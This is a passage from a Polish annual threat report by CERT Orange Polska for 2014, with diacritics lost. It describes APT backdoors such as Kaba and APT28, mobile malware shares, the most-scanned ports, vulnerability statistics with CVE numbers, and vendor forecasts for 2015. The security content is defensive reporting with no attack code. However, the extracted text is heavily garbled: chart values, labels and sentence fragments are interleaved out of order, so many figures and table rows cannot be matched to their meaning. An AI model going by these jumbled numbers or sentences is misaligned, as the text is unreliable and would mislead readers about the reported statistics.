wraporcie CERT Orange Polska, zwrciem uwag na Backdor.APT.LV. W listopadzie 2014 roku ponad 30 procent pocze zwrotnych pochodzio od tego oprogramowania. Po raz pierwszy zosta on zaobserwowany we wrzeniu 2012 roku, ajego
celem byy jednostki zajmujce si edukacj, energetyk, nowoczesnymi technologiami, produkcj, usugami finansowymi, opiek zdrowotn oraz telekomunikacj.
We wrzeniu ipadzierniku 2014 roku firma FireEye odnotowaa wPolsce aktywnoci zwizane zatakami APT: Backdor.APT.Kaba, Backdor.APT.SpyNet oraz opublikowaa raport dotyczcy grupy APT287, dla ktrej celem ataku byy midzy innymi
polskie organizacje rzdowe.
Backdoor.APT.Kaba umoliwia zdalny dostp do zainfekowanego komputera wtrybie tekstowym oraz graficznym. Ataki s przeprowadzane przy uyciu zainfekowanych dokumentw, z wykorzystaniem legalnych komponentw oprogramowania
Wykres 16.
Malware na urzdzenia mobilne

w sieci Orange Polska
50%
39%
40%
36%
35%
35%
29%
30%
20%
16%
15%
mw bezpieczestwa). Przeanalizowana prbka wykorzystuje podatno wpakie-
trzymiesiczna
cie Microsoft Office, aby uruchomi pozornie nieszkodliwy plik wykonywalny ews.
Android.CoolPaperLeak
i w efekcie bibliotek DLL, wykonujc waciwy kod zoliwego oprogramowania
Android.Malware.AndroRAT
bezporednio wpamici komputera. Pocztkowa faza ataku zostaa przedstawiona
Android.Trojan.CoinKrypt
na rysunku na poprzedniej stronie.

>> Rysunek 4.
8%
1%
1%
wrzesie
1%
Android.Trojan.Mseg
18%
17%
10%
0%
wania bezporednio w pamici komputera (w celu ominicia klasycznych syste-
zsystemem Android prbka
Android.NotCompatible
25%
5%
Zagroenia dla urzdze mobilnych
exe. Plik ten uruchamia komponent pakietu Office podatny na tzw. dll side loading
44%
44%
45%
oraz technik pozwalajcych na uruchomienie waciwego zoliwego oprogramo-
Klaudiusz Korus
Starszy Inynier Systemowy FireEye
Wicej informacji dotyczcych Backdor.APT.Kaba mona znale pod adresem:

https://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx-
9%
-kaba.html
1%
padziernik
Naley podkreli, e chocia pierwsze wystpienie APT.Kaba zostao odnotowane
listopad
wstyczniu 2012 roku, grupa odpowiedzialna za ten atak jest wci aktywna! Wpadzierniku 2014 roku FireEye opublikowa raport APT28 opisujcy dziaalno grupy
umieszcza
adunek
Rysunek 4.
wypakowuje
tworzy
Sposb dziaania
Backdoor.APT.Kaba
ews.exe
aduje
oinfop11.exe
OCX
aduje
rozpakowuje
rozszyfrowuje
oinfo11.ocx
w tym samym katalogu
DLL
oinfo11.iso
cyberprzestpcw popieranych najprawdopodobniej przez rzd rosyjski. Wodrnieniu od wspomnianych wczeniej atakw typu APT (Kaba, SpyNet) raport dotyczy
dziaalnoci samej grupy przestpczej, stanowi zatem krok w kierunku fizycznego
zidentyfikowana przestpcw, anie tylko opisania technologii przez nich wykorzystywanych. Grupa APT28 jest ukierunkowana na zbieranie informacji politycznych oraz
obronnych zwizanych zkrajami Europy Zachodniej, Gruzj iKaukazem. Dziaa co
najmniej od 2007 roku, cigle udoskonalajc irozwijajc swoje technologie.
w pamici
Wicej informacji dotyczcych grupy APT28 znajduje si pod adresem:

https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html, skd mona rwnie pobra peny raport
oraz wskaniki pozwalajce na zidentyfikowanie obecnoci grupy APT28 wsieciach
firm iinstytucji.
30
http://www.fireeye.com/resources/pdfs/apt28.pdf
31
8. Skanowania portw ipodatnoci

Przed przystpieniem do ataku na sieci informatyczne
agresor zazwyczaj zbiera informacje na temat atakowanego celu. Ten proces mona podzieli na dwa gwne etapy:
pasywne iaktywne zbieranie informacji. Do tego drugiego
etapu zalicza si midzy innymi skanowanie portw, ktre
moe wiadczy oprbach nieautoryzowanych pocze
w wyniku trwajcego ataku lub oautomatycznym dziaaniu
zoliwego oprogramowania (infekcji).
Przed przystpieniem do ataku

na sieci informatyczne agresor
zazwyczaj zbiera informacje na
temat atakowanego celu.
Skanujc porty, agresor jest wstanie ustali, jakiego rodzaju usugi sieciowe s dostpne na atakowanym urzdzeniu,
jakie aplikacje oraz wjakich wersjach s udostpniane na
otwartych portach, zjakich systemw operacyjnych korzysta ofiara. Dobierajc okrelone typy skanowania, moe
ponadto zduym prawdopodobiestwem zidentyfikowa
rodzaj wykorzystywanych firewalli oraz objte nimi usugi.
Na podstawie zdobytych wten sposb informacji agresor
tworzy map podatnoci wystpujcych wwykorzystywanych u ofiary systemach operacyjnych oraz okrela dalsze scenariusze ataku. Etap aktywnego rozpoznawania
infrastruktury jest zazwyczaj zapowiedzi realnych atakw
na sie informatyczn, dlatego tak istotne jest skuteczne
wykrywanie iutrudnianie bd uniemoliwianie takich prb.
32
Ponisze wyniki poparte dalszymi analizami ekspertw

Orange Polska docelowo stanowi rwnie przyczynek do
rozszerzenia listy blokowanych portw, za wyniki skanowania podatnoci przyniosy bezporedni efekt wpostaci usunicia potencjalnych zagroe wsystemach Orange Polska.
Orange Polska jako pierwszy operator wprowadzi domylne blokowanie dostpu do portw nie wykorzystywanych
przez uytkownikw, a sucych jako wektor ataku ze
wzgldu na fakt, e wedug domylnych ustawie systemu
pozostaj one dostpne dla ruchu sieciowego.
8.1 Skanowania portw

CERT Orange Polska uzyska techniczn moliwo identyfikacji ianalizy skanowa portw od czerwca 2014 roku.
Wanalizowanym okresie (VI-XII 14) najczciej skanowanymi portami byy: 8080, 5900, 10073 oraz 1433.
Top 10 najczciej skanowanych portw iich zastosowanie:
Port 8080
Jest uywany przez wiele serwerw web proxy oraz
aplikacji, m.in. Syncthing GUI, M2MLogger lub serwer
Apache Tomcat.
Port 5900
Uywany przez Virtual Network Computing (VNC), oprogramowanie umoliwiajce zdalny dostp do komputera.
Wiele jego wersji jest podatnych na ominicie uwierzytelnienia i uzyskanie zdalnego dostpu bez znajomoci
hasa, z tego powodu cyberprzestpca moe przej
kontrol nad zaatakowanym urzdzeniem.
identyfikatory podatnoci
eby si broni przed aktywnym rekonesansem oraz

wykorzystaniem podatnoci naley:
dba oaktualizacj oprogramowania,
nie uruchamia nadmiarowych (niepotrzebnych) usug
sieciowych,
starannie konfigurowa zapory sieciowe, udostpniane usugi sieciowe oraz inne systemy bezpieczestwa,
wprowadzi Virtual Patching (blokowanie w systemach porednich: IPS (Intrusion Protection System)/
HIPS (Host Intrusion Prevention System)/IDS (Intrusion
Detection System), moliwoci wykorzystania podatnoci) wprzypadku, gdy aktualizacja oprogramowania
nie usunie podatnoci.
RealVNC 4.1.1 CVE-2006-2369

UltraVNC 1.0.1 CVE-2006-1652
UltraVNC 1.0.2 CVE-2008-5001, CVE-2009-0388
Vino VNC Server CVE-2013-5745
Port 1433
Uywany standardowo przez MS SQL Server, popularny system zarzdzania bazami danych. Wprzeszoci
by podatny na zdalne wykonanie kodu przez przepenienie bufora (CVE-2002-1123) oraz zablokowanie
pracy serwera przez atak DDoS (CVE-1999-0999).
Najwicej atakw na port 1433 przeprowadzano
zChin, Stanw Zjednoczonych, Republiki Korei Poudniowej oraz Wietnamu.
Port 81
Uywany bezporednio przez cz instancji malware.
Porty 21320, 10073
Nieobsugiwane przez adne dedykowane oprogramowanie, prawdopodobnie uywane do realizacji jednego zbackdoorw.
Port 110
Protok POP3 uywany do odbioru poczty elektronicznej.
33
Port 3128
Uywany przez aplikacj Squid serwer poredniczcy
(Proxy). Podatny na dwa typy atakw: zablokowania
usugi spreparowanymi nagwkami http oraz umoliwienie wykonania kodu przez przepenienie bufora.
Celem ataku moe by te wykorzystanie otwartych
serwerw proxy do dalszych atakw, co utrudnia
wykrycie sprawcy.
Port 8088
Uywany przez Asterisk Web Configuration (PBX),
webowy interfejs sucy do zarzdzania central VoIP.
W wielu wersjach system ma liczne bdy umoliwiajce zdalne przejcie kontroli, ominicie autoryzacji
iuwierzytelnienia uytkownika, atake przeprowadzenie ataku Denial of Service na centralk VoIP.
Port 113
Uywany do uwierzytelniania przez rnego rodzaju
serwery IRC.
Fakt najwikszej popularnoci usugi proxy wynika
wznacznej czci ztego, e umoliwia ona atakujcemu
wykorzystanie komputera niewiadomej ofiary do poczenia z kolejnym serwerem, a w efekcie do przeprowadzenia bardziej anonimowego ataku docelowego. Wikszo
skanowanych portw jest wykorzystywana przez atakujcych przede wszystkim do skompromitowania urzdze
poprzez wykorzystanie niezaktualizowanych aplikacji, skorzystania zfunkcjonalnoci aplikacji wcelu skkompromitowania kolejnych urzdze lub zarzdzania ju skompromitowanymi.
Poniej lista krajw, zktrych przeprowadzono najwiksz
liczb skanowa portw. Tabela powstaa wwyniku analizy przez CERT Orange Polska adresw IP rde skanowania. Najwiksza liczba skanowa pochodzi z adresw
rdowych z lokalizacj w Stanach Zjednoczonych. Dla
skanowa prowadzonych z adresacji IP tego kraju zaobserwowano rwnie najszerszy zakres badanych portw.

>> Tabela 1.
Tak szeroki zakres prowadzonego rozpoznania moe
wiadczy o poszukiwaniu tylnych furtek dla systemw
i aplikacji nasuchujcych na niestandardowych portach
lub budowania mapy dostpnych usug. Mniejsza liczba
unikalnych skanowanych portw zadresacji IP innych krajw moe by dowodem na poszukiwanie przez skanujcych konkretnych podatnych usug.
Pozycja
Kraj
Liczba unikalnych portw
Stany Zjednoczone
922
Tajwan
141
Holandia
527
Chiny
478
Polska
122
Rosja
146
Francja
130
Szwecja
21
Singapur
12
10
Korea Poudniowa
311
Tabela 1. Kraje, zktrych wykryto najwiksz liczb skanowanych unikalnych portw (pozycje wg. liczby skanowa)
34
8.2 Podatnoci
Dziki podatnociom w usugach bd systemach operacyjnych atakujcy s w stanie przej dany serwis albo
nawet cay serwer, na ktrym funkcjonuje usuga. Jednym
z najbardziej destrukcyjnych atakw wykorzystujcych
podatnoci jest atak wymierzony bezporednio w systemy operacyjne. Czsto udostpniaj one rnego rodzaju
usugi sieciowe lub lokalne, dajc atakujcemu, po przejciu kontroli nad usug, pen swobod pracy.
Do najczstszych atakw zaobserwowanych przez CERT
Orange Polska nale:
SQL Injection wstrzyknicie zapytania SQL umoliwiajcego np. podejrzenie loginw i hase, zrzut bazy
danych do pliku, usunicie tabel lub przeczytanie plikw
Cross-Site Scripting (XSS) manipulacja zawartoci
strony dziki wstrzyknitemu kodowi dziaajcemu
wprzegldarce internetowej klienta. Efektem moe by
utrata danych, eskalacja uprawnie, atak na inne aplikacje. XSS to kradzie ciasteczka sesyjnego, robaki,
infekujce serwisy spoecznociowe lub wstrzykujce
pod faktyczn witryn niewidoczne ramki wykonujce akcje bez wiedzy uytkownika, np. pobierajce
zoliwe oprogramowanie.
CSRF (Cross Site Request Forgery) pozwala wykorzysta sesj uytkownika do niewiadomego przesyania da do aplikacji interpretujcej te dania
wkontekcie sesji uytkownika jako poprawne. Ataki
CSRF prowadz do eskalacji uprawnie, zmiany bd
ujawnienia danych (w tym uwierzytelniajcych). Najczciej powizane s zsieci www iprotokoem http,
znane s te przypadki wystpowania tej podatnoci
np. w serwerze ftpd (CVE-2008-4247). Wymagana
jest znajomo struktury atakowanej aplikacji.
Insecure Direct Object References bezporedni
dostp do chronionych danych poprzez manipulowanie parametrami da http.
Remote File Include (RFI) zdalne zaimportowanie
i wykonanie kodu (np. PHP) wykonywanego przez
atakujcego wramach podatnej strony, nastpnie za
wykorzystanie luki, by wykona ten kod po stronie
serwisu atakowanego. Wykorzystywane najczciej
wcelu uzyskania dostpu do danych chronionych.
Local File Include (LFI) podpatrzenie plikw na serwerze wzalenoci od narzuconych uprawnie. Pozwala
czsto rwnie na odczytanie plikw zrozszerzeniami
php, asp etc. Wrd nich mog si znale np. pliki

konfiguracyjne przechowujce hasa do baz danych,
itd.
Arbitrary File Download (AFD) czsty bd wmechanizmach pobierania plikw. Pozwala na pobranie
dowolnego (w ramach uprawnie) pliku za pomoc
odpowiedniej manipulacji ciekami. Czsto te umoliwia pobranie plikw, np. php, co moe prowadzi do
przejcia serwisu WWW.
Inne bdy logiczne do czstych przykadw bdw
logicznych naley np. niesprawdzanie rozszerzenia
podczas uploadu plikw. Bd ten moe prowadzi do
zaadowania pliku php iwykonania dowolnego kodu.
Wponiszym zestawieniu znajduj si statystyki podatnoci dotyczce aplikacji webowych oraz systemw operacyjnych zaobserwowane przez zesp CERT Orange Polska za pomoc Systemu Wykrywania Podatnoci (SWP).
SWP to zintegrowane rozproszone systemy identyfikacji
i zarzdzania podatnociami, ktre cyklicznie monitoruj
wybrane segmenty sieci oraz aplikacje www. Po kadym
ztakich cykli generowane s raporty informujce ostanie
bezpieczestwa monitorowanych systemw, przesyane
nastpnie automatycznie do osb odpowiedzialnych za
utrzymanie systemw.
CERT Orange Polska wykry wobjtych analiz na potrzeby niniejszego raportu przygotowanych do wdroenia
zasobach WWW nalecych do Orange Polska 181 unikalnych podatnoci ornych poziomach krytycznoci:
informacyjne ujawniaj np. cieki dostpu do plikw, dane dotyczce wersji itypu wykorzystywanego
oprogramowania,
niskie minimalny bezporedni wpyw na bezpieczestwo aplikacji lub systemu, mog dotyczy braku
szyfrowania danych lub saboci wwykorzystywanych
algorytmach kryptograficznych,
rednie mog prowadzi do cakowitego przeamania zabezpiecze systemu przy spenieniu okrelonych
warunkw (np. zdalne wykonanie polecenia w systemie operacyjnym, gdy uytkownik zostanie poprawnie
autoryzowany waplikacji),
wysokie maj bezporedni i natychmiastowy
wpyw na bezpieczestwo systemu bd aplikacji bez
koniecznoci speniania dodatkowych warunkw.
>> Wykres 17.
35
Wykres 17.
Podatnoci wbadanych aplika-
9%
18%
cjach WWW wpodziale na poziom

wysokie
krytycznoci
rednie
niskie
34%
informacyjne
39%
Wykres 18.
Liczba unikalnych podatnoci
80
aplikacjach WWW wprowadzanych
70
do wdroenia w skali danego
60
miesica.
Wprzypadku systemw zrodziny Windows bdy wystpuj przewanie w niezabezpieczonych usugach: SMB8,
RPC9, LSASS10, UPnP11. Wikszo znich umoliwia swobodny dostp do podatnego urzdzenia, po odpowiednim wykorzystaniu luki w oprogramowaniu. Zazwyczaj
wystarczyoby odpowiednio dba outrzymanie systemw,
by znacznie zminimalizowa ryzyko udanego ataku. Dziki prowadzonym cyklicznie przez CERT Orange Polska
testom bezpieczestwa infrastruktury iaplikacji rekomendacje bezpieczestwa wdraane przez utrzymujcych systemy i aplikacje zmniejszaj moliwo przejcia kontroli
nad systemami lub wycieku informacji.
Kolejny wykres przedstawia liczb unikalnych podatnoci

wbadanych aplikacjach WWW wprowadzanych do wdroenia wpodziale na miesice, wktrych wystpiy. Wubiegym roku rednia miesiczna liczba podatnoci wykrytych
w aplikacjach objtych analiz na potrzeby raportu przy
uyciu SWP oscylowaa wokolicy 70.

>> Wykres 18.
Liczba wystpujcych podatnoci nie ma staej tendencji
spadkowej ani wzrostowej. Powodem jest m.in. wprowadzanie cigych zmian w monitorowanych rodowiskach
przez takie czynniki jak prace developerskie, zmiana funkcjonalnoci oraz poziom wiedzy na temat bezpieczestwa
poszczeglnych deweloperw i administratorw.
W zestawieniu na poprzedniej stronie znajduj si statystyki dotyczce podatnoci zidentyfikowanych w analizowanych przez zesp CERT Orange Polska systemach
operacyjnych.

>> Wykres 19.
Poniej lista Top 10 podatnoci obserwowanych na objtych analiz serwerach webowych:

>> Tabela 2.
50
Ponisza tabela przedstawia list 10 najczciej wystpujcych podatnoci zkategorii ryzyka wysokie.

>> Tabela 3.
40
30
20
Podatno
grudzie
listopad
padziernik
wrzesie
sierpie
lipiec
czerwiec
maj
kwiecie
marzec
stycze
luty
10
6474
21%
Possible temporary file/directory
3822
12%
Application error message
1295
4%
Cross site scripting
1221
4%
operacyjnych wpodziale na po-
Email address found
1132
3%
ziom krytycznoci
Session Cookie without Secure flag set
1006
3%
rednie
Password type input with auto-complete enabled
791
2%
niskie
Unicode transformation issues
758
2%
Podatnoci wykryte wsystemach

25%
Procent wstosunku
do wszystkich podatnoci
Directory Listing
Wykres 19.
36%
Liczba
wysokie
informacyjne
Tabela 2. Podatnoci (w tym informacyjne) wystpujce najczciej w serwerach web przygotowanych do wdroenia produkcyjnego
32%
7%
Podatno
Wykres 20.
700
Liczba unikalnych podatnoci
600
wsystemach operacyjnych
wpodziale na miesice
500
400
300
200
grudzie
listopad
padziernik
wrzesie
sierpie
lipiec
czerwiec
maj
kwiecie
marzec
luty
stycze
100
Liczba
Cross-Site Scripting
1221
Unicode transformation issues
758
SVN repository found
605
Poodle
277
Slow HTTP Denial of Service attack
180
CRIME SSL/TLS (attack)
134
jQuery cross-site scripting
86
Vulnerable Javascript library
83
Microsoft IIS tilde directory enumeration
43
Backup files
20
Tabela 3. Najczciej wystpujce podatnoci, mogce generowa powane zagroenia dla serwerw webowych
Protok udostpniania zasobw (dyskw, folderw, plikw) w sieci

Protok zdalnego wywoania procedur w komunikacji midzy komputerami
Podsystem odpowiedzialny za polityk bezpieczestwa w MS Windows
11
Protok wykorzystywany m.in. do autokonfiguracji przez sie
8
36
10
37
14%
HTTP Server Prone To Slow Denial Of Service Attack
3032
11%
McAfee Common Management Agent Detected
3010
10%
Web Server Self-Signed TLS/SSL X.509 Certificate
1112
4%
SSL Certificate Short Public Key
1102
4%
Web Server Supports Weak SSL Encryption Certificates
1093
4%
Web Server Redirection Detected
628
2%
IETF X.509 Certificate Signature Collision Vulnerability
401
1%
VNC HTTP Console
331
1%
Tabela 4. Podatnoci (w tym informacyjne) wystpujce najczciej wsystemach operacyjnych
Podatno
Liczba wystpie
JBoss EJBInvokerServlet / JMXInvokerServlet Marshalled Object Remote Code Execution
134
Cisco IP Phone Information Disclosure
78
HP System Management Homepage ginkgosnmp.inc Security Bypass
75
Apache httpd Ranges Header Field Memory Exhaustion
49
PHP sqlite_udf_decode_binary() Buffer Overflow Vulnerability
49
PHP imap_mail_compose() Stack Buffer Overflow Vulnerability
41
PHP sqlite_udf_decode_binary() Buffer Overflow Vulnerability (CVE-2007-1887)
39
Apache HTTP Server mod_proxy Reverse Proxy Denial of Service Vulnerability
35
(VMSA-2013-0014) VMware ESX/ESXi LGTOSYNC.SYS Driver Privilege Escalation Vulnerability
20
(HPSBMU02947) HP System Management Homepage Multiple Vulnerabilities Prior To 7.3
19
Tabela 5. Najczciej wystpujce wsystemach operacyjnych podatnoci zkategorii wysokie
System Operacyjny
W wyniku analizy podatnych systemw operacyjnych

iporwnania zdanymi ze wiata za rok 201412 nasuwaj
si nastpujce wnioski:
podatnoci w systemach Windows Server 2003 stanowi 31 procent wszystkich podatnoci,
podatnoci w systemach Windows XP stanowi
15 procent wszystkich podatnoci,
podatnoci w systemach Linux stanowi 12 procent
wszystkich podatnoci.
Powysze nie powinno dziwi zuwagi na fakt, e Windows
XP nie jest ju objty penym supportem producenta, aokres
wsparcia dla Windows 2003 zakoczy si wbiecym roku.
Proces migracji do nowszych wersji systemw potrwa jeszcze zapewne jaki czas, co sprzyja atakujcym, chccym
wykorzysta znane, publikowane iwci niezabezpieczone
podatnoci tych systemw. Dlatego bardzo istotne jest stosowanie ochrony metod Defense-in-Depth, czyli wielowarstwowego zabezpieczenia zasobw znacznie utrudniajcego przeprowadzenie skutecznego ataku.
Pomimo tak nagego wzrostu liczby podatnoci wnastpnych miesicach widoczny jest ich spadek w grudniu
2014 roku do 117 unikalnych podatnoci. Spadek liczby
zidentyfikowanych podatnoci wynika z mechanizmw
zarzdzania ryzykiem stosowanych w Orange Polska.
Osoby odpowiedzialne za utrzymanie systemw s na
bieco informowane o stanie bezpieczestwa. Ponadto
niezalenie od dziaania systemu SWP worganizacji wdroone s procesy ipolityki majce na celu cig popraw
stanu bezpieczestwa. Wzrost liczby podatnoci z grudnia w stosunku do poprzednich miesicy wynika midzy
innymi zfaktu, e jest to miesic, wktrym wstrzymuje si
wiele prac migracyjnych iutrzymaniowych, ograniczajc je
do niezbdnego minimum z uwagi na przygotowanie do
zamknicia roku. Wpywa to na moliwo prowadzenia
zmian wmonitorowanej infrastrukturze.
Wykres 21 przedstawia liczb wystpie podatnoci
wpodziale na poziom krytycznoci.

>> Wykres 21.
Relatywnie wysoka liczba podatnoci wystpujcych

w systemach Linux wynika z faktu wystpowania wielu
dystrybucji tej rodziny systemw iujmowania ich wstatystykach jako jednej grupy. Dla czci znich dostpne jest
wysokopoziomowe wsparcie, natomiast bezpieczestwo
innych zaley gwnie od kompetencji iwiadomoci zagroe administratorw nimi zarzdzajcych. Najczstszymi
metodami atakw wykorzystujcych podatnoci, askierowanych wsystemy operacyjne iich usugi, s ataki sownikowe na mechanizmy uwierzytelnienia, przede wszystkim
na takie usugi jak: Telnet, RDP, VNC oraz SSH.
Tabela na poprzedniej stronie przedstawia dziesi najczciej wykrywanych podatnoci. Wikszo z nich naley
do kategorii informacyjne.

>> Tabela 4.
Tabela 5 to Top 10 podatnoci systemw operacyjnych
zkategorii wysokie:

>> Tabela 5.
Windows Server 2003 (Service Pack 2)
117
Linux 2.6.x
108
Windows XP
96
Linux 2.6.18
68
Windows XP (Version 5.1, Service Pack 3, Build 2600, Professional)
49
Windows 7 Professional (Service Pack 1)
32
Linux 2.4.x
26
Cisco IOS
100
Windows 7 (Service Pack 1)
50
Tabela 6. Systemy operacyjne znajwiksz liczb unikalnych podatnoci
38
Unikalna liczba podatnoci wOrange Polska
Tabela 6 pokazuje zestawienie systemw operacyjnych

zunikaln liczb wykrytych podatnoci.

>> Tabela 6.
250
Wykres 21.
Liczba wystpie podatnoci
200
rednie
150
wpodziale na poziom krytycznoci
niskie
informacyjne
wysokie
grudzie
listopad
4102
padziernik
wrzesie
Hidden WWW Server Name Detected
sierpie
23%
lipiec
czerwiec
6492
maj
kwiecie
Web Server HTTP Protocol Version Detected
Systemy operacyjne, na ktrych wykryto najwicej unikalnych podatnoci, to:

Windows Server 2003 (Service Pack 2) 201 unikalnych podatnoci,
Linux 2.6.x 193 unikalne podatnoci,
Windows XP 110 unikalnych podatnoci.
Najwiksz liczb luk bezpieczestwa w analizowanych

systemach operacyjnych zaobserwowano w miesicach
marzec-kwiecie 2014 roku. W marcu zidentyfikowano
429 unikalnych podatnoci, natomiast w kwietniu 594.
To znaczcy wzrost w porwnaniu do stycznia, gdy liczba ta wynosia zaledwie 13. Jest to zwizane z premierami nowych wersji oprogramowania (w tych miesicach
ponad 80 procent to podatnoci z kategorii informacyjne). Wykres 20 przedstawia liczb wykrytych unikalnych
podatnoci w podziale na miesice, w ktrych zostay
zidentyfikowane.

>> Wykres 20.
marzec
Procent wstosunku
do wszystkich podatnoci
luty
Liczba wystpie
stycze
Podatno
39
9. Cyber-wiat 2015
oczami partnerw Orange Polska
Rok 2015 bdzie kolejnym, wktrym zaobserwujemy wzrost zjawiska cyberszpiegostwa. Niektre pastwa oraz grupy terrorystyczne wykorzystaj cyberprzestrze do
walki ze swoimi wrogami. Bd to czyniy poprzez ataki DoS lub przy wykorzy
staniu zaawansowanego malware. Jednoczenie wtym czasie cyberszpiedzy stan
si bardziej niewidoczni dziki udoskonalonym metodom ukrywania swojej obecnoci wsieci ofiar, przez co stan si jeszcze bardziej groni. McAfee Labs obserwuje interesujce zjawisko dotyczce aktywnoci pochodzcej zEuropy Wschodniej.
Atakujcy staj si coraz bardziej cierpliwi, co oznacza, e odchodz od modelu
ataku iucieczki, koncertujc si na byciu niewidocznym woczekiwaniu na dogodny
moment do wykorzystania/sprzeday pozyskanych danych.
Rok 2015 przyniesie ogromny przyrost inteligentnych urzdze podczonych do
sieci (Internet of Things) nie tylko tych tworzcych Inteligentny Dom! Po stronie
biznesu mamy do czynienia zurzdzeniami wykorzystywanymi przy produkcji oraz
aparatur medyczn. Zakres oprogramowania izoono towarzyszce temu zjawisku nie sprzyj bezpieczestwu wtym zakresie. Ataki na urzdzenia IoT stan si
bardziej powszechne od atakw na kamery IP, systemy SCADA czy wkraczajce do
Polski inteligentne liczniki energii elektrycznej.
McAfee. Sebastian Zamora
Channel Account Manager
Dlatego wedug McAfee Labs mona si spodziewa duego ataku zwizanego bezporednio zinternetem rzeczy. Coraz czciej celem bd systemy mobilne, przede
wszystkim dla atakw typu ransomware, wymuszajcych okup za zwrcenie uytkownikowi dostpu do przechowywanych na tych urzdzeniach coraz istotniejszych
danych. Rok 2015 bdzie polem walki pomidzy specjalistami wykrywajcymi i eliminujcymi podatnoci systemw patnoci mobilnych aatakujcymi starajcymi si
wykorzysta te podatnoci. McAfee Labs przewiduje nasilon dyskusj wok tematu
prywatnoci, szczeglnie w zakresie definicji pojcia danych osobowych. Unia Europejska skupi si na regulacjach dotyczcych ochrony danych, a w efekcie take
ograniczania anonimowoci uytkownikw sieci, ktrzy bd popularyzowa metody
obchodzenia tych ogranicze. Kady aspekt regulacji Unii wtym zakresie bdzie mia
wmniejszym lub wikszym stopniu wpyw na pastwa narodowe iorganizacje biznesowe wUnii.
Naley si spodziewa ekstremalnych przyrostw atakw kierowanych na systemy
niewindowsowe. Wdrugiej poowie 2014 roku wiat dowiedzia si oluce Shellshock,
podatnoci Bash wsystemach Unix, Linux, OS X. Podatno ta pozwala atakujcemu na wykonanie dowolnej komendy na urzdzeniu ofiary, co czyni t podatno
jedn z najgroniejszych. Wiele urzdze dziaa na bazie jakiej formy Linuxa czy
Unixa (sterowniki przemysowe, systemy lotnicze, telewizory). Dopiero zaczynamy
rozumie natur tej luki. Ataki bd skierowane na zaistnienie winfrastrukturze ofiary:
od uytkownikw domowych poprzez przedsibiorstwa zalene od urzdze bazujcych na podatnych systemach. Cyberprzestpcy bd chcieli spieniy inwestycj we waciwym czasie, dajc okupu czy sprzedajc wraliwe dane. Zamknicie
jednych luk spowoduje penetracj systemw iwykrycie nowych przez atakujcych.
McAfee Labs przeanalizowao prbki malware dostpne w swoim laboratorium
wcelu zbadania, jak czsto malware jest wstanie wykorzysta znane podatnoci
aplikacji. Wzalenoci od kwartau od 1 do 6 procent prbek wykorzystao znan luk.
W 2015 roku McAfee Labs przewiduje wzrost nowo wykrytych luk bezpieczestwa
waplikacjach oraz wzrost zoliwego oprogramowania wykorzystujcego nowe luki.
40
Wiele krytycznych ipopularnych aplikacji: Microsoft Internet Explorer, Adobe Reader

czy Google Chrome ma zaimplementowane mechanizmy sandboxingu. Poniewa
te mechanizmy w skuteczny sposb eliminuj wiele prbek zoliwego oprogramowania, twrcy malware bd szuka nowych cieek dotarcia do swoich ofiar.
Podatnoci, ktre uatwiay obejcie inspekcji sandboxa, zostay wykryte w wielu
aplikacjach, za wMcAfee Labs zaobserwowano techniki wykrywania saboci pozwalajcych uciec przed inspekcj sandbox. To tylko kwestia czasu, by zostay one
udostpnione szeroko na rynku producentw malware.
W minionym roku badacze z FortiGuard Labs znaleli oprogramowanie Dorkbot/

NGRbot wyposaone wprocedury, ktre wprzypadku modyfikacji kodu powodoway samozniszczenie intruza ijednoczesne usunicie wszystkich danych zdysku
twardego. Jest to wyranie bezporednia odpowied na coraz wiksz popularno usug reagowania na sytuacje naruszenia bezpieczestwa.
Fortinet przewiduje, e autorzy atakw typu APT bd opracowywali mechanizmy
samozniszczenia dziaajce na zasadzie wyszukaj izniszcz, co powanie utrudni
prac organom cigania. Cyberprzestpcy mog rwnie wykorzystywa t taktyk do wymuszania okupu, na przykad groc, e wprzypadku nieprzelania okrelonej kwoty na podane konto firma straci wszystkie swoje dane.
Poniewa organy cigania coraz czciej api cyberprzestpcw idoprowadzaj
ich do sdu, powstan nowe, zaawansowane techniki unikania wykrycia. Dziaania
na tym polu bd skoncentrowane na unikaniu wydzielonych rodowisk uruchamiania aplikacji (ang. sandboxes), atake kierowaniu podejrze na niewinne osoby
dziki zostawianiu faszywych ladw. Cyberprzestpcy (crackerzy) bd atakowa
Internet Rzeczy systemy automatyzacji domowej i zabezpieczania prywatnych
domw imieszka (alarmy, monitoring), atake kamery internetowe. Wniebezpieczestwie znajd si newralgiczne elementy infrastruktury takie jak interfejsy czowiek-maszyna (Human Machine Interface, HMI) czy systemy przemysowe (SCADA). Najczciej rozpowszechniane i sprzedawane szkodliwe oprogramowanie
bdzie wyposaone wfunkcje pozyskiwania danych inadzoru.
Fortinet. Derek Manky

Specjalista ds. Globalnych Strategii
Bezpieczestwa
Rok 2014 nazywany jest rokiem kradziey danych, Wystarczy wspomnie choby gone wamania do sklepw Target, Michaels, P.F. Changs czy Home Depot.
Specjalici FortiGuard Labs przewiduj, e w2015 roku ta tendencja si utrzyma,
crackerzy bd wykorzystywa bardziej zaawansowane techniki iznajd nowe luki
wzabezpieczeniach systemw sklepw orazinstytucji finansowych.
Serwisy przestpcze ju teraz oferuj usugi kontroli jakoci szkodliwego oprogramowania. W2015 roku ich wachlarz zostanie rozszerzony ounikanie wykrycia przez
zaawansowane systemy bezpieczestwa iwymykajce si wykryciu wskaniki IoC
(ang. Indicator of Compromise). Wmiar rozbudowywania moliwoci badawczych
i usug oferowanych przez serwisy przestpcze crackerzy bd wykorzystywa
tego samego rodzaju procesy wcelu ustalania najlepszych sposobw na ominicie zabezpiecze. Przestpcy skupi si take na analizie infrastruktury botnetowej
pod ktem wykrywalnoci przez rozwizania rnych dostawcw.
41
W2014 roku poznalimy si prawdziwych wolumetrycznych atakw DDoS (takich

osile powyej 10 Gbps) iten trend bdzie narasta. Ju atak osile przekraczajcej
1 Gbps moe sta si problemem nawet dla duej firmy, anawet dla dostawcy internetu. Tymczasem ataki przekraczajce 20, czy 50 Gbps nie s rzadkoci ito trzeba
sobie uwiadomi, bo sytuacja bdzie si pogarsza.
Przez ostatnie lata pokazywano nam przykady atakw, ktre mog przeoy si
bezporednio na ofiary wludziach na rozruszniki serca, pocigi, samochody, czy
nawet samoloty. Wmojej opinii pytanie powinno brzmie nie czy, ale kiedy to si
stanie. Podobnie powinno brzmie pytanie o kolejne coraz bardziej efektywne ataki
na infrastruktur krytyczn: sieci przesyowe prdu, wody, telefoniczne, telewizyjne,
